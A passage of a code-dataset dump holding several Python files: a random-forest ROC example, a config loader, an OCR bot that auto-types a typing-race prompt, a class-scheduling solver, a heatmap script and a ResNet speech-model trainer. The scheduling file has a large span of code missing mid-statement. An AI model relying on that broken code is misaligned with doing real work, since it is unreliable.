axis=0)\r\n return np.divide(np.subtract(data, mus),stds)\r\n\r\n\r\n# Execute this if this file is run as __main__\r\nif __name__ == '__main__':\r\n # First command line argument is filename\r\n data, labels = get_dataset_from_csv(\"data.csv\")\r\n if data is None:\r\n print(\"Error reading file %s\" % sys.argv[1])\r\n sys.exit(1)\r\n\r\n # Normalize data\r\n data = normalize_columns(data)\r\n\r\n n_trials = 10\r\n # Train n_trials random forests and report mean and stdev for accuracy\r\n accuracies = []\r\n aucs = []\r\n importances = np.zeros((n_trials,data.shape[1]))\r\n\r\n # Compute ROC curve and ROC area for each class\r\n roc_auc = dict()\r\n\r\n for i in range(0, n_trials):\r\n (\r\n X_train, X_test, y_train, y_test\r\n ) = train_test_split(data, labels, test_size=0.1)\r\n\r\n # Train random forest\r\n classifier = RandomForestClassifier(n_estimators=20)\r\n classifier.fit(X_train, y_train)\r\n importances[i,:] = classifier.feature_importances_\r\n accuracies = accuracies + [accuracy(y_test, classifier.predict(X_test))]\r\n\r\n y_score = classifier.fit(X_train, y_train).predict_proba(X_test)\r\n\r\n fpr, tpr, _ = roc_curve(y_test, y_score[:,1], pos_label=1)\r\n aucs = aucs + [auc(fpr, tpr)]\r\n\r\n\r\n print(\"Mean Accuracy: %0.3f\\nStandard Deviation: %0.3f\" % (np.mean(accuracies), np.std(accuracies)))\r\n print(\"Importances: \", np.mean(importances, axis=0))\r\n print(\"Mean AUC: %f\" % np.mean(aucs))\r\n\r\n\r\n fpr, tpr, _ = roc_curve(y_test, y_score[:,1], pos_label=1)\r\n aucs = aucs + [auc(fpr, tpr)]\r\n\r\n\r\n plt.figure()\r\n lw = 2\r\n plt.plot(fpr, tpr, color='darkorange',\r\n lw=lw, label='ROC curve (area = %0.2f)' % aucs[-1])\r\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\r\n plt.xlim([0.0, 1.0])\r\n plt.ylim([0.0, 1.05])\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n plt.title('ROC For Malignant Class')\r\n plt.legend(loc=\"lower right\")\r\n plt.show()\r\n\r\n fpr, tpr, _ = roc_curve(y_test, y_score[:,0], pos_label=0)\r\n aucs = aucs + [auc(fpr, tpr)]\r\n\r\n\r\n plt.plot(fpr, tpr, color='darkorange',\r\n lw=lw, label='ROC curve (area = %0.2f)' % aucs[-1])\r\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\r\n plt.xlim([0.0, 1.0])\r\n plt.ylim([0.0, 1.05])\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n plt.title('ROC For Benign Class')\r\n plt.legend(loc=\"lower right\")\r\n plt.show()\r\n","sub_path":"random_forest_example/randomforest.py","file_name":"randomforest.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"230573491","text":"import configparser\nimport os\nfrom platform import system\nfrom utils.util import JsonUtil, HttpUtil, FileUtil\n\nfrom utils.log import Logger\nfrom utils.aspect import singleton\n\n\n@singleton\nclass Configs(object):\n '''\n classdocs\n '''\n __config = None\n\n logger = Logger().getLogger()\n\n def __init__(self, alternative_file=''):\n cfg_file = os.environ.get(\"CONFIG_FILE\", os.path.abspath('nemesismiddleware.cfg'))\n\n self.logger.info('carregando confs, file=%s' % cfg_file)\n\n if not FileUtil.fileExists(cfg_file):\n if FileUtil.fileExists(alternative_file):\n self.logger.info(\"loadding alternative file: %s\" % alternative_file)\n cfg_file = alternative_file\n else:\n raise Exception(\"error loading config: file not found: \" + cfg_file)\n\n '''\n Constructor\n '''\n self.__loadConfig(cfg_file)\n\n def __loadConfig(self, filename):\n self.__config = configparser.RawConfigParser()\n self.__config.read(filename)\n\n def getConfig(self, filename):\n if not self.__config:\n self.__loadConfig(filename)\n return self.__config\n\n def get(self, section, propertyName, defaultValue=None):\n if not self.__config:\n raise Exception(\"config not loaded\")\n value = self.__config.get(section, propertyName)\n value = value if value else defaultValue\n return value\n\n def getKeyList(self, section, propertyName):\n return self.get(section, propertyName).split('|')\n\n def get_app_settings(self):\n return JsonUtil.decode(self.__load_remote_config_file(self.get('app', 'web-url-settings')))\n\n def get_locale(self):\n import locale\n try:\n if system() == \"Windows\":\n br_locale = \"ptb_bra\"\n else:\n br_locale = (\"pt_BR\", \"UTF-8\")\n locale.setlocale( locale.LC_ALL, br_locale)\n except locale.Error:\n self.logger.exception(\"setup locale error\")\n return locale\n\n def __load_remote_config_file(self, url_or_path):\n settings = None\n if(url_or_path.startswith(\"http\")):\n settings = HttpUtil.get_url(url_or_path)\n else:\n with open(url_or_path, 'r') as f:\n settings = f.read()\n\n if (not settings):\n raise Exception(\"settings is empty: %s\" % url_or_path)\n return settings","sub_path":"elasticsearch/src/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"136575213","text":"import pytesseract\nfrom PIL import Image\nimport time\nimport pyautogui\nimport cv2\nimport numpy as np\nprint(\"move to the first position\")\ntime.sleep(2)\nx1, y1 = pyautogui.position()\nprint(\"move to the second position\")\ntime.sleep(2)\nx2, y2 = pyautogui.position()\nscreenshot = pyautogui.screenshot(region=(x1, y1, x2 - x1, y2-y1))\nscreenshot.save('screenshot.png')\nimage = cv2.imread(\"screenshot.png\")\n# hsv=cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n#\n# white_lo = np.array([0,0,170])\n# white_hi = np.array([18i0, 255,255])\n# mask = cv2.inRange(hsv, white_lo, white_hi)\n# image[mask>0]=(255,255,255)\n\n# text_lo=np.array([0,0,0])\n# text_hi=np.array([180,255,120])\n# mask = cv2.inRange(hsv, text_lo, text_ho)\n# image[mask>0]=(0,0,0)\n\ncv2.imwrite(\"screenshot.png\", image)\ntext = pytesseract.image_to_string(Image.open(\"screenshot.png\"))\nif text[0] == '|':\n text = text[1::]\nelif text[0] == 'i':\n text = 'I' + text[1::]\n\ntext = text.replace('|', 'I')\nistext = text.replace('[', '')\ntext = text.replace('\\n', ' ')\ntext = text.replace('(', '')\nprint(\"move to the text box\")\ntime.sleep(2)\npyautogui.typewrite(text, interval=0.035)\nprint(text)\n\n","sub_path":"type_racer_main.py","file_name":"type_racer_main.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"330015269","text":"######################################\n########0)Set up permutations#########\n######################################\n\n#####UPDATE ALLCLASSASSIGNMENTS EVER LOOP\n\nimport itertools\nimport math\nimport random\nimport sys\n\npermutations=[]\nsublist=[]\nallClassAssignments=[[],[],[],[],[],[]]\n\nfor x in itertools.permutations('1'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\nfor x in itertools.permutations('12'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\nfor x in itertools.permutations('123'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\nfor x in itertools.permutations('1234'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\nfor x in itertools.permutations('12345'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\nfor x in itertools.permutations('123456'):\n sublist.append(x)\npermutations.append(sublist)\nsublist=[]\n\n##########################\n########1) Objects###########\n##########################\n\nclass Teacher(object):\n def __init__(self, name, subjects,teacherNumber,restrictions): #Initalizes teacher\n self.name=name\n self.subjects=subjects\n self.iteration=0;\n self.newSubjects=subjects\n self.teacherNumber=teacherNumber\n self.restrictions=[]\n if restrictions:\n for i in range(1,len(restrictions)):\n self.restrictions.append(restrictions[i])\n \n #def periodRestriction(self, period): #Restricts teacher from teaching at a particular period\n # self.restrictions.append(period)\n def getName(self): #Returns name\n return self.name\n def getSubjects(self): #Returns subjects\n return self.subjects\n def getSubject(self, index): #Returns particular subject\n self.arrangeSubjects()\n return self.subjects[index]\n def getIteration(self): #Returns iterations\n return self.iteration\n def iterate(self): #Increments iterations\n self.iteration=self.iteration+1\n def backTrack(self): #Decrements iterations\n self.iteration=self.iteration-1\n def clearIterations(self): #Clears iterations\n self.iteration=0\n ##Clear subject period assignments\n for i in range(0,len(self.subjects)):\n self.subjects[i].setPeriod(-1)\n def finalIteration(self): #Tests for final iteration\n\n #if self.iteration==math.factorial(len(self.subjects)):\n #print(\"Final iteration at: \" + str(self.iteration))\n #numberOfSubjects=len(self.subjects)\n #print(permutations[numberOfSubjects-1][self.iteration])\n if self.iteration==720:\n return True\n else:\n return False\n def lackingTogetherness(self): #Check no problem with other periods that this class should be with\n #Need to check for no previous classes scheduled\n togethernessCounter=0\n classesPreviouslyScheduled=0\n for j in range(0,len(self.subjects)):\n if self.subjects[j].together!=[]: #Check if class must be with another class\n togethernessCounter+=1\n togetherPeriod=self.subjects[j].getPeriod()\n ##Check for one together class at same time\n for i in range(0,len(allSubjects)):\n if self.subjects[j].together==allSubjects[i].getName():\n if allSubjects[i].getPeriod()!=-1:\n classesPreviouslyScheduled+=1\n if togetherPeriod==allSubjects[i].getPeriod():\n togethernessCounter-=1 #Together class schedule at this period \n if togethernessCounter==0 or classesPreviouslyScheduled==0: #No classes need to be scheduled together\n return False\n else:\n return True #No schedule classes were found\n\n \n\n def conflict(self): #Tests for conflict\n self.arrangeSubjects()\n ##1) Check for required corresponding classes##\n if self.lackingTogetherness()==True: #If togetherness conflict, return true\n return True\n numberOfSubjects=len(self.subjects)\n ##2) Test for restrictions##\n for i in range(0,numberOfSubjects): #Test for period restrictions\n if str(self.subjects[i].getPeriod()) in self.restrictions:\n return True\n\n ##3) Test for first teacher## \n if self.name==teachers[0].getName(): #Aside for restrictions, no conflict for first teacher\n return False\n\n \n ##4) Check for too many classes at once per grade##\n #Get all core subjects and check for any period that has more than three grade and core classes\n #currentPeriodAssignments.checkForGradeOrCoreOverlaps()\n for grade in range(0,6): #Iterate through grades\n periodTally=[0,0,0,0,0,0]\n for i in range(0,len(allClassAssignments[grade])): #Iterate through particular classes\n assignedPeriod=allClassAssignments[grade][i].getPeriod()\n if assignedPeriod>0:\n portionOfClassAssigned=1/float(allClassAssignments[grade][i].getSize())\n periodTally[assignedPeriod-1]+=portionOfClassAssigned\n #Conflict if 3 or more of same class in period:\n if periodTally[assignedPeriod-1]>1: #Conflict if more than 100percent of grade assigned same problem\n return True\n #Conflict if 2 or more doubled classes\n ##>>> ADD CODE HERE\n \n\n \n \n \n ## Old method of checking## \n #for i in range(0,self.teacherNumber): #Check for conclicts with all other subjects\n # otherNumberOfSubjects=len(teachers[i].getSubjects())\n # for j in range(0,numberOfSubjects):\n # for k in range(0,otherNumberOfSubjects):\n # if teachers[i].getSubject(k).conflictsWith(self.subjects[j]):\n # return True\n ##\n return False\n def arrangeSubjects(self):\n numberOfSubjects=len(self.subjects)\n for i in range(0,numberOfSubjects):\n iterationIndex=int(permutations[5][self.iteration][i])\n self.subjects[i].setPeriod(iterationIndex)\n\n # allClassAssignments=[[],[],[],[],[],[]]\n # for j in range(0,numberOfTeachers):\n # for k in range(0,len(teachers[j].getSubjects())):\n # allClassAssignments[int(teachers[j].getSubjects()[k].getGrade())-7].append(teachers[j].getSubjects()[k])\n\n\n def getSubjectOrder(self): #Broken\n return permutations[numberOfSubjects-1][self.iteration]\n def getSubjectsString(self): #Returns subjects ordered according to iteration\n subjectsString=\"\"\n self.arrangeSubjects()\n for period in range(1,7):\n subjectsString=subjectsString+\"\\nPeriod \"+str(period)+\": \"\n for i in range(0,len(self.subjects)):\n if self.subjects[i].getPeriod()==period:\n subjectGrade=self.subjects[i].getGrade()\n subjectTitle=self.subjects[i].getSubjectTitle()\n subjectsString=subjectsString+subjectGrade+\"th \" + subjectTitle\n subjectsString=subjectsString+\"\\n\"\n return subjectsString\n \n \n \n \n\nclass Subject(object):\n def __init__(self, name, teacherIndex): #Initalizes subject\n self.name=name;\n if name[0]==\"1\": #If 10th, 11th, or 12th, take two numbers for grade\n self.grade=name[0:2]\n self.subjectTitle=name[2:len(name)-1] #Find subject appropriately\n elif name[0]==\"7\" or name[0]==\"8\" or name[0]==\"9\":\n self.grade=name[0]\n self.subjectTitle=name[1:len(name)-1]\n self.teacherIndex=teacherIndex\n self.period=-1\n self.roster=[]\n self.together=[]\n self.size=name[-1]\n allClassAssignments[int(self.grade)-7].append(self) #Update total class list\n for i in range(0,len(rosters)):\n if self.name==rosters[i][0]:\n self.roster=rosters[i][1:len(rosters[i])]\n if self.roster:\n print(self.name)\n print(self.roster)\n for i in range(0,len(together)):\n if self.name==together[i][0]:\n self.together=together[i][1]\n if self.together:\n print(str(self.name) + \" with \" + str(self.together))\n def getName(self): #Returns name\n return self.name\n def getSubjectTitle(self): #Returns name\n return self.subjectTitle\n def getRoster(self): #Returns roster\n return self.roster\n def getGrade(self): #Returns grade\n return self.grade\n def getPeriod(self): #Returns period\n return self.period\n def getSize(self): #Returns size\n return self.size\n def setPeriod(self, period): #Sets period\n self.period=period \n def rosterConflictWith(self, otherSubject): #Checks if two subjects have a roster conflict\n if self.roster==[]:\n return False #Assume no conflict if no roster\n for i in range(0,len(self.roster)):\n if self.roster[i] in otherSubject.roster:\n return True\n def conflictsWith(self, otherSubject): #Tests if two subjects conflict\n\n \n #Ensure that this period matches with period of other class or class is not schedule\n if otherSubject.getGrade()==self.grade:\n if self.rosterConflictWith(otherSubject) or otherSubject.getSection()==self.section:\n if otherSubject.getPeriod()==self.period: \n return True\n \n \n return False\n \n\n\n##########################\n#####2) Read file#########\n##########################\noriginalFile=open('classes','r')\nrawData=originalFile.readlines()\nteachers=[]\ndata=[]\nfor line in rawData:\n data.append(line.split())\n\noriginalFile.close()\n\n\n####################################################\n#####3) Create Teacher and class objects############\n####################################################\n## Test for rosters\nrosterIndex=0\nteacherIndex=0\ntogetherIndex=0\ni=0\nrosters=[]\ntogether=[]\nallSubjects=[]\n\nwhile teacherIndex==0 and iRepeat:\"+allSubjects[i].getName())\n # sys.exit()\n subjectNames.append(allSubjects[i].getName())\n\n#Section conflict tally\nperiod1ConflictTally=[0,0,0,0,0,0]\nperiod2ConflictTally=[0,0,0,0,0,0]\nperiod3ConflictTally=[0,0,0,0,0,0]\n\nfor i in range(0,len(allSubjects)):\n if subjectNames[i][-1]==\"1\" and subjectNames[i][0]==\"7\":\n period1ConflictTally[0]=period1ConflictTally[0]+1\n if subjectNames[i][-1]==\"1\" and subjectNames[i][0]==\"8\":\n period1ConflictTally[1]=period1ConflictTally[1]+1\n if subjectNames[i][-1]==\"2\" and subjectNames[i][0]==\"7\":\n period2ConflictTally[0]=period2ConflictTally[0]+1\n if subjectNames[i][-1]==\"2\" and subjectNames[i][0]==\"8\":\n period2ConflictTally[1]=period2ConflictTally[1]+1\n if subjectNames[i][-1]==\"3\" and subjectNames[i][0]==\"7\":\n period3ConflictTally[0]=period3ConflictTally[0]+1\n if subjectNames[i][-1]==\"3\" and subjectNames[i][0]==\"8\":\n period3ConflictTally[1]=period3ConflictTally[1]+1\n\n#print(\"Section 1 Conflict Tally\")\n#print(period1ConflictTally)\n#print(\"Section 2 Conflict Tally\")\n#print(period2ConflictTally)\n#print(\"Section 3 Conflict Tally\")\n#print(period3ConflictTally)\n\n\n#periodAssignments=[[],[],[],[],[],[]]\n\n##Build Period assignments\n#for i in range(0,len(teachers)): #For each teacher\n# tempSubjects=teachers.getSubjects()\n# for i in range(0,len(tempSubjects)): #For each of their subjects\n #Log period assignment\n \n#for i in range(0,6):\n# for j in range(0,len(allClassAssignments[i])):\n# print(allClassAssignments[i][j].getName())\nallClassAssignments1=allClassAssignments\nallClassAssignments=[[],[],[],[],[],[]]\nfor j in range(0,numberOfTeachers):\n for k in range(0,len(teachers[j].getSubjects())):\n allClassAssignments[int(teachers[j].getSubjects()[k].getGrade())-7].append(teachers[j].getSubjects()[k])\nif allClassAssignments1==allClassAssignments:\n print(\"Copied\")\n\n### Main Loop ###\ni=0 \n\nwhile i bot\n top_to_bot_float = np.matrix([[0.0] * N] * N)\n top_to_bot_bool = np.matrix([[True] * N] * N)\n # bot -> top\n bot_to_top_float = np.matrix([[0.0] * N] * N)\n bot_to_top_bool = np.matrix([[True] * N] * N)\n # left -> right\n left_to_right_float = np.matrix([[0.0] * N] * N)\n left_to_right_bool = np.matrix([[True] * N] * N)\n # right -> left\n right_to_left_float = np.matrix([[0.0] * N] * N)\n right_to_left_bool = np.matrix([[True] * N] * N)\n\n for i in range(N):\n for j in range(N):\n # top -> bot\n if i != N - 1:\n top_to_bot_bool[i, j] = abs(matrix[i, j] - matrix[i+1, j]) < 1\n # bot -> top\n if i != 0:\n bot_to_top_bool[i, j] = abs(matrix[i, j] - matrix[i-1, j]) < 1\n # left -> right\n if j != N - 1:\n left_to_right_bool[i, j] = abs(matrix[i, j] - matrix[i, j+1]) < 1\n # right -> left\n if j != 0:\n right_to_left_bool[i, j] = abs(matrix[i, j] - matrix[i, j-1]) < 1\n \n\n for i in range(N):\n for j in range(N):\n top_to_bot_bool[i, j] = not(top_to_bot_bool[i, j]) or not(left_to_right_bool[i, j])\n \n n = n.split(\".\")[0]\n\n # overview\n plt.imshow(matrix, interpolation='nearest', cmap='hot')\n plt.savefig(\"extras/\"+n+\"-heatmap.png\", bbox_inches='tight')\n\n # bool\n # top -> bot\n plt.imshow(top_to_bot_bool, interpolation='nearest', cmap='Greys_r', vmin=0, vmax=1)\n plt.savefig(\"extras/\"+n+\"-top_to_bot_bool.png\", bbox_inches='tight')\n\nif __name__ == '__main__':\n name = input(\"Datei visualisieren: \")\n possible_paths(name)\n","sub_path":"Bwinf-Aufgabe2-Wildschweine/heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"255908855","text":"# Test image loading\r\nimport pstats\r\nimport cProfile\r\n\r\nimport pygame\r\nimport Code.imagesDict as images\r\npygame.display.set_mode((600, 400))\r\n\r\ndef main():\r\n IMAGESDICT, UNITDICT, ICONDICT, ITEMDICT, ANIMDICT = images.getImages()\r\n assert len(IMAGESDICT) > 0\r\n assert len(UNITDICT) > 0\r\n assert len(ICONDICT) > 0\r\n assert len(ITEMDICT) > 0\r\n\r\nif __name__ == '__main__':\r\n cProfile.run(\"main()\", \"Profile.prof\")\r\n s = pstats.Stats(\"Profile.prof\")\r\n s.strip_dirs().sort_stats(\"time\").print_stats(10)\r\n","sub_path":"Tests/test_image_load.py","file_name":"test_image_load.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"506605994","text":"from resnet_1 import *\nfrom datetime import datetime\nimport time, datetime\nimport os\nimport math\nimport argparse\n# from resnet_1_input import *\nfrom processing import batchdispenser, kaldiIO\n#import pandas as pd\n\n\nclass Train(object):\n '''\n This Object is responsible for all the training and validation process\n '''\n\n def __init__(self):\n # Set up all the placeholders\n self.placeholders()\n\n def placeholders(self):\n '''\n There are five placeholders in total.\n image_placeholder and label_placeholder are for train images and labels\n vali_image_placeholder and vali_label_placeholder are for validation imgaes and labels\n lr_placeholder is for learning rate. Feed in learning rate each time of training\n implements learning rate decay easily\n '''\n self.input_placeholder = tf.placeholder(dtype=tf.float32,\n shape=[FLAGS.train_batch_size, INPUT_HEIGHT,\n INPUT_WIDTH, INPUT_DEPTH])\n self.label_placeholder = tf.placeholder(dtype=tf.int32, shape=[FLAGS.train_batch_size])\n\n #self.vali_input_placeholder = tf.placeholder(dtype=tf.float32, shape=[FLAGS.validation_batch_size,\n # INPUT_HEIGHT, INPUT_WIDTH, INPUT_DEPTH])\n #self.vali_label_placeholder = tf.placeholder(dtype=tf.int32, shape=[FLAGS.validation_batch_size])\n\n self.lr_placeholder = tf.placeholder(dtype=tf.float32, shape=[])\n\n self.is_training_placeholder = tf.placeholder(dtype=tf.bool, shape=[])\n\n #self.reuse_placeholder = tf.placeholder(dtype=tf.bool, shape=[])\n\n def build_train_validation_graph(self):\n '''\n This function builds the train graph and validation graph at the same time.\n\n '''\n global_step = tf.Variable(0, trainable=False)\n validation_step = tf.Variable(0, trainable=False)\n\n # Logits of training data and valiation data come from the same graph. The inference of\n # validation data share all the weights with train data. This is implemented by passing\n # reuse=True to the variable scopes of train graph\n logits = inference(self.input_placeholder, FLAGS.num_residual_blocks, #self.reuse_placeholder,\n self.is_training_placeholder)\n #vali_logits = inference(self.vali_input_placeholder, FLAGS.num_residual_blocks, reuse=True, is_training=False)\n\n # The following codes calculate the train loss, which is consist of the\n # softmax cross entropy and the relularization loss\n #regu_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n loss = self.loss(logits, self.label_placeholder)\n #self.full_loss = tf.add_n([loss] + regu_losses)\n self.full_loss = loss\n\n predictions = tf.nn.softmax(logits)\n self.train_top1_error = self.top_k_error(predictions, self.label_placeholder, 1)\n\n # Validation loss\n #self.vali_loss = self.loss(vali_logits, self.vali_label_placeholder)\n self.vali_loss = loss\n #vali_predictions = tf.nn.softmax(vali_logits)\n #self.vali_top1_error = self.top_k_error(vali_predictions, self.vali_label_placeholder, 1)\n self.vali_top1_error = self.top_k_error(predictions, self.label_placeholder, 1)\n\n self.train_op, self.train_ema_op = self.train_operation(global_step, self.full_loss,\n self.train_top1_error)\n #self.val_op = self.validation_op(validation_step, self.vali_top1_error, self.vali_loss)\n\n def train(self):\n '''\n This is the main function for training\n '''\n\n # For the first step, we are loading all training images and validation images into the\n # memory\n # all_data, all_labels = prepare_train_data(padding_size=FLAGS.padding_size)\n # vali_data, vali_labels = read_validation_data()\n\n # create a feature reader\n featdir = FLAGS.featdir\n aligdir = FLAGS.aligdir\n\n featreader = kaldiIO.TableReader(featdir + '/feats_delta_5fr_sp_bi.scp')\n lablreader = kaldiIO.LabelReader(aligdir + '/labels.scp')\n uid_list_lab = lablreader.get_uid_list()\n featreader.remove_lab_difference(uid_list_lab)\n # get the shuffled order of the feat list, and shuffle the lable list with the order\n scp_order = featreader.get_scp_order()\n lablreader.shuffle_utt(scp_order)\n\n vali_featdir = FLAGS.vali_featdir\n vali_aligdir = FLAGS.vali_aligdir\n\n vali_featreader = kaldiIO.TableReader(vali_featdir + '/feats_delta_5fr_sp_bi.scp', False)\n vali_lablreader = kaldiIO.LabelReader(vali_aligdir + '/labels.scp')\n\n vali_uid_list_feat = vali_featreader.get_uid_list()\n vali_lablreader.remove_utt_difference(vali_uid_list_feat)\n\n vali_uid_list_labl = vali_lablreader.get_uid_list()\n vali_featreader.remove_lab_difference(vali_uid_list_labl)\n\n vali_scp_order = vali_featreader.get_scp_order()\n vali_lablreader.shuffle_utt(vali_scp_order)\n # create a target coder\n # xsr6064 coder = target_coder.AlignmentCoder(lambda x, y: x, num_labels)\n\n dispenser = batchdispenser.BatchDispenser(featreader, lablreader, int(FLAGS.bulk_size),\n int(FLAGS.train_batch_size), FLAGS.train_shuffle_flag)\n vali_dispenser = batchdispenser.BatchDispenser(vali_featreader, vali_lablreader, int(FLAGS.bulk_size),\n int(FLAGS.validation_batch_size), FLAGS.valid_shuffle_flag)\n\n # Build the graph for train and validation\n self.build_train_validation_graph()\n\n # Initialize a saver to save checkpoints. Merge all summaries, so we can run all\n # summarizing operations by running summary_op. Initialize a new session\n saver = tf.train.Saver(tf.global_variables())\n #summary_op = tf.summary.merge_all()\n init = tf.initialize_all_variables()\n sess = tf.Session()\n\n # If you want to load from a checkpoint\n if FLAGS.is_use_ckpt is True:\n print ('Restoring from checkpoint... {}'.format(FLAGS.ckpt_path))\n saver.restore(sess, FLAGS.ckpt_path)\n print ('Restored model ...')\n else:\n sess.run(init)\n\n # This summary writer object helps write summaries on tensorboard\n #summary_writer = tf.summary.FileWriter(FLAGS.train_dir + '/log', sess.graph)\n\n # These lists are used to save a csv file at last\n #step_list = []\n #train_error_list = []\n #val_error_list = []\n\n print ('Start training...')\n print ('----------------------------')\n\n best_model = 0 #--------------------------\n\n #validation_loss_value, validation_error_value = self.full_validation(loss=self.vali_loss,\n # top1_error=self.vali_top1_error,\n # vali_dispenser=vali_dispenser,\n # session=sess)\n # #batch_data=train_batch_data,\n # #batch_label=train_batch_labels\n #vali_featreader.reset()\n #vali_lablreader.reset(vali_featreader.get_scp_order())\n #vali_dispenser.reset()\n validation_loss_value = 10000\n validation_error_value = 10000\n\n #_, _, _ = vali_dispenser.get_batch()\n print (\"Starting Validation Loss: {} | Staring Validation Error: {}\".format(validation_loss_value, validation_error_value))\n print ('------------------------------------------------------------')\n print('\\n')\n\n lr = FLAGS.init_lr_res\n half_lr = 0 #--------------------------------------------\n #stop_training = False\n\n for epoch in range(0, FLAGS.train_epoch): #---------------------------------\n end_epoch = False\n start_time = time.time()\n\n # Training\n iter = 0\n #for x in range(100):\n print ('Start training Epoch {}'.format(epoch))\n print ('The Learning rate of the epoch is: {}'.format(lr))\n while not end_epoch:\n train_batch_data, train_batch_labels, end_epoch = dispenser.get_batch()\n if train_batch_data == []:\n continue\n train_batch_data = np.array(self.stack_batch(train_batch_data))\n assert (train_batch_data.shape == (int(FLAGS.train_batch_size), 40, 11, 3))\n\n _, _, train_loss_value, train_error_value = sess.run([self.train_op, self.train_ema_op,\n self.full_loss, self.train_top1_error],\n {self.input_placeholder: train_batch_data,\n self.label_placeholder: train_batch_labels,\n #self.vali_input_placeholder: validation_batch_data,\n #self.vali_label_placeholder: validation_batch_labels,\n #self.reuse_placeholder: False,\n self.is_training_placeholder: True,\n self.lr_placeholder: lr}\n )\n #train_error_list.append(train_error_value)\n print(\"Epoch {}, Iter {}: training loss: {}, training error: {}\".format(epoch, iter, train_loss_value, train_error_value))\n iter = iter + 1\n if math.isnan(train_loss_value):\n break\n duration = time.time() - start_time\n featreader.reset()\n lablreader.reset(featreader.get_scp_order())\n dispenser.reset()\n print (\"Time spend for epoch {}: {}\".format(epoch, str(datetime.timedelta(seconds=duration))))\n print ('\\n')\n\n # Check the validation\n # loss first\n if not math.isnan(train_loss_value):\n print ('Strat Validation ...')\n validation_loss_value_new, validation_error_value_new = self.full_validation(loss=self.vali_loss,\n top1_error=self.vali_top1_error,\n vali_dispenser=vali_dispenser,\n #vali_labels=vali_labels,\n session=sess\n #batch_data=train_batch_data,\n #batch_label=train_batch_labels\n )\n vali_featreader.reset()\n vali_lablreader.reset(vali_featreader.get_scp_order())\n vali_dispenser.reset()\n else:\n validation_loss_value_new = 10000\n validation_error_value_new = 10000\n\n print (\"Validation Loss: {} | Validation Error: {}\".format(validation_loss_value_new,\n validation_error_value_new))\n\n #vali_summ = tf.Summary()\n #vali_summ.value.add(tag='full_validation_error',\n # simple_value=validation_error_value.astype(np.float))\n #summary_writer.add_summary(vali_summ, epoch)\n #summary_writer.flush()\n\n #val_error_list.append(validation_error_value)\n\n #train_batch_data, train_batch_labels, _ = dispenser.get_batch()\n #train_batch_data = np.array(self.stack_batch(train_batch_data))\n\n #validation_batch_data, validation_batch_labels, _ = vali_dispenser.get_batch()\n #validation_batch_data = np.array(self.stack_batch(validation_batch_data))\n\n #summary_str = sess.run(summary_op, {self.input_placeholder: train_batch_data,\n # self.label_placeholder: train_batch_labels,\n #self.vali_input_placeholder: validation_batch_data,\n #self.vali_label_placeholder: validation_batch_labels,\n # self.lr_placeholder: lr})\n #summary_writer.add_summary(summary_str, epoch)\n\n print ('Validation top1 error = %.4f' % validation_error_value_new)\n print ('Validation loss = ', validation_loss_value_new)\n print ('----------------------------')\n\n #step_list.append(epoch)\n\n validation_loss_value_pre = validation_loss_value\n\n if validation_loss_value_new < validation_loss_value:\n validation_loss_value = validation_loss_value_new\n best_model = epoch\n checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')\n else:\n checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt_reject')\n\n # Save checkpoints every epoch\n saver.save(sess, checkpoint_path, global_step=epoch)\n # save the training error to csv files\n #df = pd.DataFrame(data={'train_error': train_error_list})\n #df.to_csv(FLAGS.train_dir + '/' + str(epoch) + '_train_error.csv')\n\n if validation_loss_value_pre != validation_loss_value and \\\n (validation_loss_value_pre - validation_loss_value) / validation_loss_value_pre \\\n < FLAGS.stop_training_bar and \\\n lr != FLAGS.init_lr_res:\n print (\"(Vali_loss_pre - Vali_loss) / Vali_loss_pre: ({} - {}) / {} = {}\".format(validation_loss_value_pre,\n validation_loss_value, validation_loss_value_pre, (validation_loss_value_pre -\n validation_loss_value) / validation_loss_value_pre))\n print ('Stop training: Validation Loss decrease is too small')\n break\n if (validation_loss_value_pre - validation_loss_value) / validation_loss_value_pre \\\n < FLAGS.halving_lr_bar:\n half_lr = 1\n if half_lr == 1:\n lr = FLAGS.lr_decay_factor * lr\n print (\"(Vali_loss_pre - Vali_loss) / Vali_loss_pre: ({} - {}) / {} = {}\".format(validation_loss_value_pre,\n validation_loss_value, validation_loss_value_pre, (validation_loss_value_pre -\n validation_loss_value) / validation_loss_value_pre))\n print ('Learning rate decayed to ', lr) \n print ('------------------------------------------')\n print ('\\n')\n\n if best_model != epoch:\n ckpt_path = os.path.join(FLAGS.train_dir, 'model.ckpt-' + str(best_model))\n print ('Restoring from checkpoint: {}'.format(ckpt_path))\n saver.restore(sess, ckpt_path)\n print ('Restored from checkpoint ...')\n\n #df = pd.DataFrame(data={'epoch': step_list, 'validation_error': val_error_list})\n #df.to_csv(FLAGS.train_dir + '/' + str(epoch) + '_validation_error.csv')\n\n print ('Done training...')\n print ('----------------------------')\n\n\n def test(self):\n '''\n :return: the softmax probability with shape [num_test_images, num_labels]\n '''\n\n test_featdir = FLAGS.test_featdir\n #test_aligdir = FLAGS.aligdir\n\n test_featreader = kaldiIO.TableReader(test_featdir + 